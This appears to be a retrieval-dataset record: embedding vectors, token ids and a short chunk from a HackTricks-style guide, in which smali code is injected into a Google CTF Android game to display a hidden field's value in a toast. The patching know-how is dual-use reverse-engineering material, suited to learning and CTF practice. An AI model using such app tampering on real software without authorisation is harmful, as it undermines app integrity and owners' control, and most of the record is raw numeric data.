-0.08178996294736862, 0.1585405319929123, -0.6019943356513977, 0.698085606098175, 0.6105372905731201, -0.5180919170379639, 0.5488446354866028, -0.11964848637580872, 0.3636589050292969, 0.19675596058368683, -1.0325114727020264, -0.04019470140337944, 0.09644706547260284, -0.13519082963466644, 0.09875430166721344, 0.27057310938835144, -0.3182336688041687, -0.5225331783294678, -0.16180209815502167, -0.651831328868866, -0.15489840507507324, 0.04935009777545929, -0.158206969499588, -0.30849307775497437, -0.6301832795143127, 0.5310930609703064, 0.9557104110717773, 0.5173585414886475, 0.37377509474754333, -1.3523088693618774, 0.6240116953849792, -0.09833110123872757, -0.6037024259567261, -0.09193214029073715, 0.3533324897289276, 0.4381626844406128, -0.2803865373134613, 0.012964037247002125, 0.27121639251708984, -0.4252922236919403, 0.7153450846672058, -0.4431493282318115, -0.020176302641630173, -0.3245231509208679, 0.40920746326446533, 0.020920639857649803, 0.46129581332206726, 0.6154713034629822, -0.24822038412094116, 0.5874201059341431, -0.5541760921478271, -1.034164309501648, 0.3443812429904938, -1.3362098932266235, 0.008019402623176575, -0.10399528592824936, -0.4671814441680908, 0.024859292432665825, -0.3722984194755554, -0.701736569404602, 0.021064721047878265, 0.046750448644161224, -0.1362970471382141, 0.23509521782398224, 0.06275510787963867, -0.3213021457195282, 1.0127443075180054, -1.073461890220642, -0.23674364387989044, -0.3894180953502655, 0.10807988047599792, -0.45951658487319946, -1.1003615856170654, -0.09796303510665894, 0.29886019229888916, 0.6501922011375427, 0.33428311347961426, -0.2950579524040222, 0.274625688791275, 0.13992276787757874, -0.051721930503845215, -0.14766204357147217, 0.42105215787887573, -0.5126166343688965, 0.4538634419441223, -0.7549987435340881, -0.1493421494960785, -0.3985545039176941, 0.5769503116607666, 0.4551986753940582, -0.1284586787223816, -0.29102927446365356, 0.8199684619903564, 0.6613755822181702, -0.2768678069114685, 0.7767518758773804, 0.7727595567703247, 0.6303178668022156, -0.5769802927970886, 0.38985389471054077, 0.09748610109090805, 0.42345646023750305, -0.21500885486602783, 0.5778770446777344, -0.15738481283187866, -0.07924108952283859, 0.7878941893577576, -0.5201787948608398, -0.3762355446815491, 0.31350499391555786, -0.5231578350067139, -0.48503389954566956, -0.27186015248298645, -0.803423285484314, 0.19355490803718567, 0.4108642041683197, -0.5861119627952576, 0.4565741717815399, 0.011037720367312431, 0.22582997381687164, 0.6873646378517151, -0.13338492810726166, 0.5588827133178711, -0.37717363238334656, 0.34807857871055603, -0.15954220294952393, -0.045035842806100845, -0.4163989722728729, 0.13780061900615692, -0.808384358882904, 0.6244422793388367, 0.6919690370559692, 0.381507009267807, -0.7716720104217529, 0.43491053581237793, -0.5238192081451416, 0.7631462216377258, 0.31060126423835754, 0.08840294927358627, -0.05713867396116257, 0.7146101593971252, -0.12682639062404633, -0.7871061563491821, -0.08511938154697418, 0.5170965790748596, 0.010283910669386387, 0.10463026165962219, 0.34512412548065186, 0.031883880496025085, 0.034244246780872345, -0.528174877166748, 0.3529289960861206, -0.5382692217826843, -0.15014292299747467, 0.21647313237190247, 0.2220568209886551, -0.6018252968788147, 0.4394207000732422, 0.6272037029266357, 0.6855901479721069, 0.6624237895011902, 1.0041313171386719, -0.021900704130530357, 0.20754271745681763, 0.3712112307548523, 0.0974474549293518, -0.44059136509895325, 0.014093524776399136, 0.3246923089027405, -0.7290418148040771, 0.15187567472457886, -0.2804645597934723, 0.5561585426330566, 0.5566461682319641, -0.3408642113208771, -0.3768232762813568, -0.395827978849411, -0.18484757840633392, -0.3691248893737793, 0.2657468318939209, 0.030173756182193756, -0.5877408385276794, -0.2934686839580536, 0.673558235168457, 0.18398158252239227, 0.9438744783401489, -0.10481877624988556, -0.9439884424209595, -0.23534972965717316, 0.47933661937713623, -0.3105407655239105, 0.6597210168838501, -0.9666904211044312, -0.14832256734371185, -0.05000598356127739, -0.9276010394096375, -0.24044398963451385, 0.0003688992001116276, 0.24500559270381927, -0.5160933136940002, 0.32128772139549255, 0.6026137471199036, 0.374240517616272, 0.4810548424720764, -0.14675429463386536, -0.35347118973731995, -0.11770652234554291, 0.34140413999557495, 0.016563529148697853, 0.595964252948761, 0.36578384041786194, 0.2215154767036438, -0.04587351903319359, 0.0652318000793457, 0.5690858960151672, 0.09212684631347656, -0.05019606277346611, -0.3301125466823578, -0.14577710628509521, -0.6921512484550476, -0.27111953496932983, -0.3695205748081207, -0.1319544017314911, 0.431643009185791, -0.0572209358215332, -0.837371826171875, -0.011522888205945492, -0.4958128333091736, 0.17964795231819153, -0.28513437509536743, 0.15419605374336243, 0.6088540554046631, -0.13656428456306458, 0.5578060150146484, -0.926371693611145, 4.326353549957275, 0.5445034503936768, 0.1378745287656784, 0.546208918094635, 0.5977292656898499, 0.32791250944137573, 0.8434271216392517, -0.735517144203186, 0.27311766147613525, -0.05641398951411247, -0.0065908837132155895, -0.14169947803020477, 0.5160823464393616, 0.4486145079135895, 0.731926441192627, 0.45120537281036377, -0.13136668503284454, -0.37471258640289307, 0.4874821901321411, -0.9170037508010864, -0.5478249788284302, -0.09428150951862335, -0.45269638299942017, 0.18602648377418518, 0.595436692237854, -0.3231610953807831, 0.23967120051383972, -1.6569314002990723, 0.21962234377861023, -0.6844131946563721, 0.12953448295593262, -0.4417029023170471, 0.46468719840049744, -0.293005108833313, -0.6323373317718506, -0.15336188673973083, 0.27318835258483887, -0.8190150856971741, -0.4966979920864105, 0.007484572008252144, 0.2342321127653122, 0.06432187557220459, 0.06593531370162964, -0.5905646085739136, 0.47194138169288635, 0.5567302107810974, -0.760202944278717, 0.2865239679813385, 0.3806695342063904, -1.163038730621338, 0.4938013553619385, 0.07336977869272232, 0.6749784350395203, 0.3604876399040222, -1.2395890951156616, -0.07011241465806961, 0.856290876865387, -0.3627200126647949, -0.04853331670165062, -0.21426615118980408, 0.3854234516620636, -0.08906855434179306, 0.6884802579879761, 0.22856418788433075, -1.0049487352371216, 0.0814257487654686, -0.33545517921447754, -0.467377245426178, -0.4991903603076935, 0.11490488797426224, 0.11702233552932739, -0.21975529193878174, -0.12336918711662292, 0.13233152031898499, 1.48601233959198, 0.19524112343788147, -0.6408369541168213, 0.38912829756736755, 0.20022593438625336, -0.21623802185058594, -0.5585475564002991, -0.9575971364974976, -0.7297890782356262, 0.03377429395914078, 0.7705585956573486, 0.8632569313049316, -0.4983693063259125, -0.5570915937423706, -0.25704121589660645, 0.39358624815940857, 0.1987156718969345, 0.16360628604888916, 0.04198294132947922, 0.22049075365066528, 0.37045830488204956 ]
[ 10128, 1011, 3393, 1001, 2625, 2030, 19635, 10128, 1011, 1041, 4160, 1001, 19635, 1001, 2131, 1013, 3828, 12332, 1997, 2019, 4874, 25538, 2102, 1058, 2692, 1010, 1052, 2692, 1010, 29215, 5358, 1013, 8224, 1013, 14931, 2546, 1013, 4618, 8545, 13068, 16098, 4168, 1013, 2208, 18908, 7730, 1025, 1011, 1028, 1051, 1024, 1045, 1001, 3828, 2023, 1012, 1051, 2503, 1058, 2692, 11514, 4904, 1058, 2692, 1010, 1052, 2692, 1010, 29215, 5358, 1013, 8224, 1013, 14931, 2546, 1013, 4618, 8545, 13068, 16098, 4168, 1013, 2208, 18908, 7730, 1025, 1011, 1028, 1051, 1024, 1045, 1001, 3828, 1058, 2692, 2503, 2023, 1012, 1051, 1001, 2288, 2080, 1024, 2288, 2080, 1035, 1020, 1001, 13520, 2023, 2073, 2017, 2215, 2000, 2707, 1037, 7077, 10128, 1011, 11265, 1058, 2692, 1010, 1058, 2683, 1010, 1024, 2288, 2080, 1035, 1020, 1001, 2065, 2025, 19635, 1010, 2175, 2000, 1024, 1024, 2288, 2080, 1035, 1020, 3995, 3406, 1024, 2288, 2080, 1035, 1020, 1001, 2467, 2175, 2000, 1024, 1024, 2288, 2080, 1035, 1020, 5638, 13327, 3431, 21197, 4726, 1001, 8833, 2663, 1024, 1026, 2193, 1028, 1045, 18150, 1058, 2629, 1010, 1052, 2692, 1010, 29215, 5358, 1013, 8224, 1013, 14931, 2546, 1013, 4618, 8545, 13068, 16098, 4168, 1013, 2208, 18908, 7730, 1025, 1011, 1028, 1051, 1024, 1045, 1001, 2131, 2023, 1012, 1051, 2503, 1058, 2629, 2378, 6767, 3489, 1011, 10763, 1063, 1058, 2629, 1065, 1010, 1048, 3900, 3567, 1013, 11374, 1013, 5164, 1025, 1011, 1028, 3643, 11253, 1006, 1045, 1007, 1048, 3900, 3567, 1013, 11374, 1013, 5164, 1025, 1001, 10938, 2193, 2000, 5164, 5302, 3726, 1011, 2765, 1011, 4874, 1058, 2487, 1001, 2693, 2000, 1058, 2487, 8663, 3367, 1011, 5164, 1058, 2629, 1010, 1000, 5222, 1000, 1001, 3828, 1000, 2663, 1000, 2503, 1058, 2629, 2378, 6767, 3489, 1011, 10763, 1063, 1058, 2629, 1010, 1058, 2487, 1065, 1010, 2455, 22943, 1013, 21183, 4014, 1013, 8833, 1025, 1011, 1028, 1040, 1006, 1048, 3900, 3567, 1013, 11374, 1013, 5164, 1025, 1048, 3900, 3567, 1013, 11374, 1013, 5164, 1025, 1007, 1045, 1001, 15899, 1000, 5222, 1024, 1026, 16371, 2213, 1028, 1000, 11433, 1024, 2065, 2017, 2024, 2183, 2000, 2224, 4161, 10857, 2503, 1996, 3853, 1006, 4161, 1058, 2692, 1010, 1058, 2487, 1010, 1058, 2475, 1012, 1012, 1012, 1007, 2404, 2122, 3210, 2090, 1996, 1012, 2334, 1026, 2193, 1028, 1998, 1996, 8170, 2015, 1997, 1996, 10857, 1006, 9530, 3367, 1058, 2692, 1010, 1014, 2595, 2487, 1007, 2065, 2017, 2215, 2000, 2404, 1996, 15899, 3642, 1999, 1996, 2690, 1997, 1996, 3642, 1997, 1037, 3853, 1024, 5587, 1016, 2000, 1996, 2193, 1997, 4161, 10857, 1024, 4654, 1024, 2013, 1012, 10575, 2184, 2000, 1012, 10575, 5940, 2063, 2047, 10857, 2323, 2022, 1996, 2279, 3616, 1997, 1996, 2525, 4161, 10857, 1006, 1999, 2023, 2742, 2323, 2022, 1058, 10790, 1998, 1058, 14526, 1010, 3342, 2008, 2009, 4627, 1999, 1058, 2692, 1007, 1012, 2689, 1996, 3642, 1997, 1996, 15899, 3853, 1998, 2224, 1058, 10790, 1998, 1058, 14526, 2612, 1997, 1058, 2629, 1998, 1058, 2487, 1012, 15174, 2075, 28578, 6633, 5677, 2000, 5587, 1017, 2000, 1996, 2193, 1997, 1012, 10575, 2012, 1996, 2927, 1997, 1996, 3853, 1012, 2023, 3642, 2003, 4810, 2000, 2022, 12889, 1999, 1996, 2690 ]
hack_tricks
424.txt
2
of a function ( change the number of the variables as necessary ). it will take the value of this. o, transform it to string and them make a toast with its value. const / 4 v10, 0x1const / 4 v11, 0x1const / 4 v12, 0x1iget v10, p0, lcom / google / ctf / shallweplayagame / gameactivity ; - > o : iinvoke - static { v10 }, ljava / lang / string ; - > valueof ( i ) ljava / lang / string ; move - result - object v11invoke - static { p0, v11, v12 }, landroid / widget / toast ; - > maketext ( landroid / content / context ; ljava / lang / charsequence ; i ) landroid / widget / toast ; move - result - object v12invoke - virtual { v12 }, landroid / widget / toast ; - > show ( ) v [SEP]
[ -0.30688193440437317, -0.030345870181918144, -0.3149890601634979, 0.37755337357521057, -0.39679843187332153, -0.7277395129203796, 0.27611732482910156, 0.33011478185653687, 0.5602003335952759, 0.5588358044624329, 0.6621807813644409, 0.2944128215312958, 0.2390696406364441, -0.48469287157058716, 0.024074357002973557, -0.2929157614707947, -0.5790476202964783, -0.36852383613586426, -0.7349967360496521, 0.3995579481124878, 0.19661270081996918, 0.09265308827161789, -1.6312429904937744, -1.0165504217147827, -0.12109815329313278, -0.17708183825016022, 0.5018201470375061, -0.38060006499290466, 0.602550208568573, 0.8343251347541809, 0.11533347517251968, -0.09256735444068909, 0.7130444645881653, -0.42883843183517456, 0.10258107632398605, -0.2725498378276825, 0.7983829975128174, -0.2342880219221115, 0.2681159973144531, -0.1345248818397522, 0.8053675293922424, -0.13813762366771698, 0.43124523758888245, -0.7128150463104248, -1.3748894929885864, -0.03153625503182411, -0.00981585681438446, -0.30595582723617554, -0.13616925477981567, 0.0560726523399353, -0.5347146987915039, 0.48554888367652893, 0.01599114201962948, -0.026723958551883698, -0.23664109408855438, -0.46356767416000366, -0.36916011571884155, -0.0652851015329361, -0.15253488719463348, 0.37067911028862, -0.111214779317379, 0.4152175784111023, -0.40592947602272034, -0.7429714202880859, -0.4489556550979614, 0.1468350887298584, -0.4903690218925476, -0.17887862026691437, -0.08469175547361374, -0.7644662261009216, -1.1056870222091675, 0.0348561592400074, -0.5749803781509399, -0.765785813331604, -0.5888359546661377, 0.23301778733730316, -0.3887344300746918, 0.20143629610538483, -0.2069532424211502, 0.6561046838760376, -0.20470426976680756, 0.5700984597206116, 0.12079548835754395, -0.0860038623213768, -1.154861569404602, -0.42395082116127014, 0.504387617111206, -0.05324738472700119, 0.21153905987739563, -0.4781840145587921, -0.49022650718688965, 0.5102837085723877, 0.05417831987142563, -0.24667949974536896, 0.7738903164863586, 0.9022603034973145, 0.14709000289440155, 0.3951147198677063, 0.3900287449359894, -0.2645411789417267, 0.9597881436347961, 0.5087026357650757, -0.6546578407287598, 0.579906702041626, 0.05151351913809776, 0.8434902429580688, 0.37770262360572815, 0.3311012089252472, -1.1316074132919312, -0.9322254061698914, -0.37116333842277527, 0.20564334094524384, 1.217669129371643, -0.2367146611213684, -0.08540458232164383, 0.8191165328025818, -0.2667487859725952, 0.2445588856935501, -0.30596134066581726, 0.12921805679798126, 0.3919055461883545, -0.4642270803451538, 0.22884614765644073, -0.808890700340271, 0.2036169171333313, -0.13651229441165924, -0.7038516998291016, 0.842779815196991, -0.06333481520414352, 0.06813321262598038, -0.007905099540948868, -0.27285924553871155, -0.101224385201931, 0.5943544507026672, -0.4866739511489868, 0.2847365438938141, 0.1789095401763916, 0.25678911805152893, 0.01666155830025673, -0.5976380705833435, 0.40786951780319214, -0.511337399482727, -0.12656447291374207, 1.4726227521896362, 0.20193207263946533, -0.2820671498775482, 0.07031971961259842, 1.1263344287872314, -0.8527610301971436, 0.4674568176269531, 0.0877939760684967, 0.4159456491470337, 0.6453397274017334, -0.13261543214321136, -0.0037437425926327705, -0.1467473953962326, -0.45110753178596497, 0.5695086121559143, -0.09279794245958328, 0.17952071130275726, -0.04063262790441513, -0.16002273559570312, -0.6614497303962708, 0.6820277571678162, 0.17781803011894226, 0.29967981576919556, -0.4376469552516937, -0.3501105308532715, 0.25872403383255005, 0.20806965231895447, 0.3431623876094818, 0.18138957023620605, -0.39108511805534363, -0.3927087187767029, 1.0565121173858643, 0.44964319467544556, 0.24953335523605347, 0.027134638279676437, -0.5220018029212952, 0.2915785610675812, -0.6630513072013855, 0.9563567042350769, 0.45344042778015137, 0.276871919631958, 0.1361657828092575, -0.4893623888492584, -0.44893088936805725, 0.48334935307502747, -0.4642281234264374, -0.2752244174480438, 0.12865255773067474, 1.012815237045288, -0.7902565598487854, -0.06515928357839584, -0.2788732647895813, 0.1788242608308792, -0.7994636297225952, 0.19466198980808258, -0.49122217297554016, -0.7252480387687683, -0.7069330215454102, -0.17664474248886108, 0.11039280146360397, -0.25745442509651184, -0.15644249320030212, -0.593322217464447, 0.3914862275123596, 1.0942893028259277, -0.24220404028892517, 0.8954859375953674, -0.3906940817832947, -0.09884145110845566, -0.5581851601600647, 0.6742805242538452, 0.5354668498039246, -0.12706421315670013, -0.5713638663291931, 0.22102348506450653, -0.17796045541763306, 0.17157194018363953, 0.13502073287963867, 0.9414852261543274, 0.3060421943664551, 0.7278013825416565, -0.49372342228889465, 0.006966100074350834, 0.527160108089447, 0.5542367100715637, 0.027167756110429764, 1.0439831018447876, 0.15697647631168365, 0.9259618520736694, -0.07141128927469254, 0.8233115673065186, 0.11564850807189941, 0.492510050535202, 0.6677296161651611, 0.6786396503448486, 0.2622112035751343, -0.25475597381591797, -0.8664293885231018, 0.986601710319519, 0.47676143050193787, 0.3273661434650421, 0.12884917855262756, 0.03250330314040184, 0.7648516893386841, 0.20596545934677124, -0.16007208824157715, 0.9410715699195862, -0.491481751203537, 0.8858736753463745, 0.281673789024353, -0.04626738280057907, -0.5565634965896606, -0.48692482709884644, -0.08837173879146576, 0.5947608947753906, -0.47579333186149597, -1.1344420909881592, 1.5077109336853027, 0.028796961531043053, 0.0023246563505381346, 0.2425207644701004, 0.26546403765678406, 0.35308775305747986, 0.6997334957122803, -0.5715477466583252, -0.3824417293071747, -1.055985689163208, -0.35889410972595215, -0.3850124478340149, -0.1447696089744568, -0.5505359172821045, -1.1999633312225342, 0.4762076735496521, 0.5948402285575867, -0.9082072973251343, 0.9469106197357178, -0.2218192219734192, 0.30566054582595825, -0.5503445863723755, -0.6639276146888733, 0.8883492350578308, 0.16846832633018494, 0.11830345541238785, -0.4017643332481384, 0.20626738667488098, -0.0732828676700592, 0.1302904337644577, -0.1498851776123047, -0.5847039818763733, 0.2537485659122467, -0.2570713460445404, -0.48384156823158264, -0.3567560315132141, -0.6311626434326172, 0.04551662504673004, -0.25512391328811646, -0.4457013010978699, -0.9927950501441956, -0.1482902318239212, -0.3759825527667999, 0.6022870540618896, -0.15992192924022675, 0.5559914708137512, 0.29512009024620056, -0.24603842198848724, 0.7796837687492371, 0.4350455105304718, -0.037150897085666656, 0.29655104875564575, 0.18362054228782654, 0.021022330969572067, -0.28591927886009216, 0.11221477389335632, 0.35131314396858215, 0.7073850631713867, -1.04000723361969, -0.748975396156311, 0.09136966615915298, -0.42626267671585083, -0.6801117062568665, -0.15395770967006683, -0.3280225992202759, 0.6267012357711792, -0.46753451228141785, -1.3416014909744263, -0.2682134509086609, 0.031899552792310715, -0.11780328303575516, -0.6347064971923828, -0.14873087406158447, 0.8523387908935547, 0.21217454969882965, -0.04772480949759483, 0.03833616152405739, 0.271733820438385, 0.02456965669989586, -0.010916037485003471, 0.7015237212181091, -0.5107023119926453, -0.3818083703517914, 0.7190052270889282, 0.3245355486869812, 0.8324868083000183, 0.22974401712417603, -0.5617879629135132, 0.23180311918258667, -0.5693188905715942, -0.31778484582901, -0.0831325501203537, 0.4093685746192932, -0.07519936561584473, 0.8012123107910156, 0.2781519591808319, -0.9078401923179626, -0.1916964203119278, 0.07070522010326385, 0.004904685076326132, 0.3072015345096588, 0.4369683265686035, -0.18134142458438873, -0.19044481217861176, -0.40399080514907837, 0.03318878635764122, -0.17078420519828796, 1.1307990550994873, 0.5350608229637146, -1.0354664325714111, 0.1734967827796936, -0.12553568184375763, -0.011284071952104568, 0.020810872316360474, -0.35339587926864624, 0.29265692830085754, 1.361128568649292, 0.0509217195212841, 0.4066360890865326, 0.05215292423963547, 0.1863822340965271, 0.10914411395788193, -0.24739554524421692, 0.8448490500450134, 0.84088134765625, 0.324239045381546, -0.3877318501472473, 0.3218914568424225, -0.5558525919914246, -0.4563416540622711, 0.024473322555422783, -0.08320435881614685, 0.609661340713501, -0.6616761088371277, 0.04125259444117546, -0.29428115487098694, 0.14311160147190094, 0.05396647751331329, 0.9747880101203918, 0.48027944564819336, -0.07467606663703918, -0.08472874015569687, 0.42527398467063904, 0.362000972032547, -1.2744598388671875, 0.1571817547082901, -0.3331097662448883, 0.4651450514793396, -0.2694026827812195, 0.7737917900085449, -0.033992595970630646, 0.05413476750254631, -0.30820485949516296, -0.15491151809692383, 0.7549282908439636, 0.2939895689487457, -0.9243969321250916, 0.8273652791976929, 0.8106990456581116, 0.6463729739189148, 0.21763712167739868, -0.03853894770145416, -0.3720608353614807, 0.4001805782318115, 0.9980441927909851, -0.46395403146743774, 0.027002938091754913, -0.5316490530967712, 0.5700702667236328, 0.8491849303245544, -0.4776677191257477, 0.14469307661056519, -0.569606363773346, -0.1993250697851181, -0.2979349195957184, 0.8964016437530518, 0.8611745834350586, -0.44093772768974304, 0.20512647926807404, -0.6730851531028748, 0.33166977763175964, 0.18574461340904236, -0.4916571080684662, 0.15319974720478058, -0.5947370529174805, -0.10378896445035934, 0.5164297223091125, -0.3291305899620056, -0.8420459032058716, 0.44840818643569946, 0.794434666633606, -0.4348498284816742, 0.6683528423309326, -0.2897900938987732, 0.373428612947464, -0.5870394706726074, -0.12347438931465149, -0.2770804166793823, 0.2829951345920563, -0.282958060503006, -0.04435218125581741, -0.7851823568344116, 0.4096103012561798, -0.5860201120376587, -0.07833448052406311, 0.6910033822059631, -0.30359992384910583, 0.733374834060669, 0.3175455331802368, 0.19498278200626373, -0.3141796588897705, 0.4452532231807709, -0.20250453054904938, -1.033569574356079, 0.027339043095707893, -0.5363518595695496, 0.49858757853507996, -0.4802723526954651, -0.30927708745002747, 0.1319308876991272, -0.5208414793014526, 0.7875253558158875, -0.28288623690605164, -0.8399717211723328, 0.5208236575126648, -0.8871018290519714, -0.11704358458518982, 0.3978586792945862, 0.06840197741985321, 0.012106958776712418, -0.2133965939283371, -0.07437282055616379, 0.677342414855957, 0.057794239372015, -0.0020002713426947594, 0.05586952716112137, -0.590779185295105, -0.16051951050758362, -0.23085317015647888, -0.0026818490587174892, 1.24192476272583, -0.39231306314468384, -1.116763710975647, -0.1251322627067566, -0.3205209970474243, 0.3569812774658203, -0.17117293179035187, -0.2622399628162384, 0.1892687976360321, -0.6778829097747803, -0.45035889744758606, 0.7629350423812866, -0.3564547002315521, -0.043997395783662796, 0.6477473974227905, 0.578218936920166, 0.2572861909866333, -0.7522946000099182, -0.5387557148933411, 0.7752743363380432, 0.35177069902420044, -0.9689928889274597, -0.8640109896659851, 0.421108216047287, -0.12596991658210754, 0.49861764907836914, 0.34192052483558655, 0.16872772574424744, -0.5955687165260315, -1.2441390752792358, 0.4149341285228729, -0.8067072629928589, 0.4884013831615448, -0.7907217144966125, -0.695551872253418, -0.038127973675727844, 0.02195998840034008, -0.3118087947368622, -1.0629831552505493, -0.4378744959831238, -0.7480549216270447, -0.036820922046899796, -0.4882897138595581, -0.040896739810705185, -0.0853906124830246, 0.18093369901180267, -0.2862550914287567, 1.1241278648376465, 0.051300667226314545, 0.7917749881744385, -0.18546836078166962, -0.089068703353405, 0.2217811644077301, 0.2854083180427551, -0.40621381998062134, -0.09582341462373734, -0.12114289402961731, 0.07508141547441483, 0.2750961184501648, 0.17420746386051178, -0.2828550934791565, -0.008795936591923237, -0.24666853249073029, -0.2927131652832031, -0.5500249862670898, -0.6509750485420227, -0.33197879791259766, -0.5020187497138977, -0.19039563834667206, -0.5827406048774719, 0.24474331736564636, -0.6188639402389526, 0.6002612113952637, 0.036066532135009766, -0.6199456453323364, -0.33535921573638916, -0.4160841107368469, -1.6276789903640747, -1.3184348344802856, 0.028134958818554878, 0.1951093226671219, 0.6352918148040771, -0.5203551650047302, -0.2832835912704468, 0.6210712194442749, -0.8289561867713928, 0.2646249830722809, 1.2957369089126587, 0.9903578162193298, 0.5743538737297058, -1.0707944631576538, 1.1260082721710205, 0.9169540405273438, -0.6869770288467407, 0.021948738023638725, 0.20807071030139923, -0.16885145008563995, -0.3677341639995575, -0.590597927570343, -0.6382322907447815, -0.8636631369590759, 0.4063328206539154, 0.5477246642112732, 0.0140616986900568, 0.44765713810920715, -0.19932565093040466, -0.6943656802177429, -0.4436647593975067, 0.3468075096607208, 0.23527438938617706, -0.05198267102241516, 0.8028843998908997, 0.4095030426979065, 0.7847404479980469, 1.0737942457199097, -0.06901557743549347, -0.6296507120132446, -0.029775671660900116, 0.39308327436447144, -0.6439512372016907, -0.49586451053619385, 0.5772534608840942, 0.051365334540605545, -0.7563466429710388, -0.17260603606700897, -1.0595329999923706, -0.3284713625907898, -0.5843865275382996, -0.44079479575157166, -0.8560009598731995, -0.5258573293685913, -0.15515770018100739, 0.23092536628246307, -0.3758120536804199, 0.22001788020133972, 0.10279645025730133, -0.7364875674247742, 0.39985260367393494, -0.4156721830368042, 0.016271106898784637, 1.138386845588684, -0.34853506088256836, -0.2698495388031006, -0.9451525211334229, -0.1777254343032837, -0.10269095003604889, 0.29961124062538147, 1.3094154596328735, 0.2671234905719757, 0.9346402287483215, 0.37036755681037903, 0.1686387062072754, 0.5195046663284302, 0.12962651252746582, 0.11043796688318253, 0.1821557730436325, -0.25337380170822144, -0.7497863173484802, 0.25507211685180664, 0.2197827845811844, 0.21205316483974457, 0.10403519868850708, -0.06448002904653549, 0.13324642181396484, 0.47031867504119873, 0.7414929270744324, -0.4158492684364319, -0.33154579997062683, 0.15589569509029388, -0.9288071990013123, -0.09378326684236526, -0.9311976432800293, -0.33472660183906555, 0.5159117579460144, 0.31221047043800354, 0.04521257430315018, -0.631078839302063, 0.13274455070495605, 0.3046160042285919, -0.22894258797168732, 0.37264886498451233, -0.1623874008655548, -0.08138567954301834, -0.06831025332212448, -0.5461761951446533, -0.3916415572166443, -0.18200275301933289, -0.718917965888977, -0.48272866010665894, -0.7144545912742615, -0.4934774935245514, -0.7118974924087524, 0.9428860545158386, 0.30482399463653564, 0.1724219173192978, -0.28358471393585205, -0.3719579577445984, 0.45544663071632385, -0.061545975506305695, -0.14267762005329132, 0.7559187412261963, 0.04833512380719185, 0.1384383738040924, -0.274408221244812, -0.09671157598495483, -0.18969649076461792, -0.3653649091720581, 0.5969370603561401, 0.21320608258247375, -0.8087280988693237, 0.4569443166255951, -0.5069476962089539, -0.32653018832206726, -0.7916451692581177, 0.2342674732208252, -0.5157944560050964, 1.2551289796829224, -0.01841118186712265, 0.28070101141929626, 0.7645624876022339, 0.8214184045791626, -0.16732625663280487, 0.1723947525024414, -0.31394264101982117, -0.20194505155086517, 0.4172039031982422, -0.0895504280924797, 0.7870044708251953, 0.16355693340301514, -0.31535831093788147, 0.005775103811174631, -0.30738043785095215, -0.07782018184661865, -0.1632416546344757, 0.3941701054573059, -0.6161375045776367, -0.20142686367034912, -0.31137949228286743, 0.3910680413246155, 0.05203920975327492, 0.3021935522556305, 0.48276641964912415, -0.6116577386856079, -0.008922805078327656, -0.08988270163536072, 0.40711331367492676, 0.15387727320194244, -1.3467686176300049, -0.9084336161613464, 0.7986552715301514, -0.7344008088111877, 0.21577765047550201, -0.314931184053421, -0.15670733153820038, -0.15616819262504578, -0.21267752349376678, 0.22299019992351532, 0.5240615606307983, -0.434591680765152, 0.02091817744076252, 0.5947331190109253, -1.3340330123901367, -0.27324268221855164, 0.32924118638038635, 0.6259374618530273, -0.37120500206947327, -0.46872642636299133, 0.09918352216482162, 0.4745369255542755, 0.17456215620040894, -0.39596402645111084, -0.5160554051399231, -0.07855677604675293, -0.24228864908218384, 0.6895021796226501, -0.046263545751571655, 0.4959409534931183, -0.023650694638490677, 0.23092900216579437, -0.9918842315673828, 0.5719098448753357, -0.6786007285118103, 0.22882229089736938, 0.3362447917461395, 0.3013342618942261, -0.0925055593252182, 1.0953614711761475, 1.0215034484863281, -0.22836646437644958, 1.1510401964187622, -0.057243648916482925, 0.07493627071380615, -0.015313147567212582, -0.696677565574646, -0.2228802740573883, 0.8948830366134644, 1.521520972251892, 0.7746785879135132, 0.36031755805015564, -0.12051811069250107, -0.029457617551088333, 0.43869343400001526, 0.09770897775888443, 0.16460512578487396, 0.1704883575439453, 0.08678685128688812, 0.5701617002487183, -0.4334193468093872, -0.5187991857528687, -0.005135771818459034, 0.1660422533750534, -0.4915553331375122, -0.20994645357131958, 0.34895846247673035, -0.006349971517920494, -0.6398530602455139, 0.42934682965278625, -0.5206959247589111, -0.38540884852409363, 0.19500243663787842, 0.18100717663764954, -0.08825273811817169, 0.5164527893066406, -1.2494851350784302, 0.09398175776004791, 0.416220098733902, -0.029077796265482903, 0.6891934275627136, -0.05634835362434387, 0.19320082664489746, 0.43640872836112976, -0.5034884214401245, 0.2750883400440216, -0.1052866131067276, 0.5334453582763672, -0.055156294256448746, -0.3672238290309906, -0.8358082175254822, -0.011625003069639206, 0.26185673475265503, -0.22034788131713867, 0.04087281972169876, -0.4562264382839203, -0.16275273263454437, -0.8801157474517822, -0.1138734370470047, -0.16381224989891052, 0.5158648490905762, 0.5653018355369568, -0.12692146003246307, -0.29702550172805786, 0.9857101440429688, 0.13001391291618347, 0.3146674335002899, -0.35956254601478577, 1.0877916812896729, -0.22900259494781494, 1.1393460035324097, 0.3400387763977051, -0.44804656505584717, -0.7488634586334229, 0.4897862374782562, -0.1384095847606659, -0.1614782065153122, -0.3835730254650116, -0.6779447197914124, -0.21305707097053528, -0.45363447070121765, -0.38012954592704773, -0.2711338400840759, 0.6553877592086792, -0.40806904435157776, -0.5006765127182007, 0.36646565794944763, 0.27762818336486816, -1.2205506563186646, 0.7674776315689087, -0.1740562617778778, 0.26401200890541077, 0.33835846185684204, -0.03602736443281174, -0.26590317487716675, -0.6372928619384766, -0.16818247735500336, -0.8328370451927185, 0.6196736693382263, -0.6340397596359253, -0.13985541462898254, -0.4668041169643402, -0.39233529567718506, -0.40740886330604553, -0.6229466199874878, 0.34941840171813965, -0.46952539682388306, 0.5993502736091614, 0.86329185962677, 0.19890914857387543, -0.10481362789869308, -0.3006800413131714, -0.40860527753829956, 0.3645818531513214, 0.6091783046722412, -0.04452478513121605, 1.045627236366272, 0.5010968446731567, -0.10998526960611343, 0.12850025296211243, -0.19975022971630096, 0.6940813064575195, 0.21275225281715393, -0.02914760820567608, 0.080410435795784, 0.05970245972275734, -0.39417847990989685, -0.3265864849090576, -0.4453364610671997, 0.714388370513916, -0.4321668744087219, 0.6945616006851196, -0.9978419542312622, 0.1485835760831833, -0.810623824596405, -0.8148924708366394, -0.4114973247051239, 0.5548149347305298, -0.7472785711288452, 0.02658979594707489, 0.7804370522499084, -1.3812246322631836, 4.0808892250061035, 0.734075665473938, 0.36577627062797546, 0.44454994797706604, 0.2819328308105469, 1.1778961420059204, 0.1273898035287857, -0.22599199414253235, -0.5117016434669495, -0.4963448643684387, 0.8152308464050293, -0.050498735159635544, -0.21101520955562592, 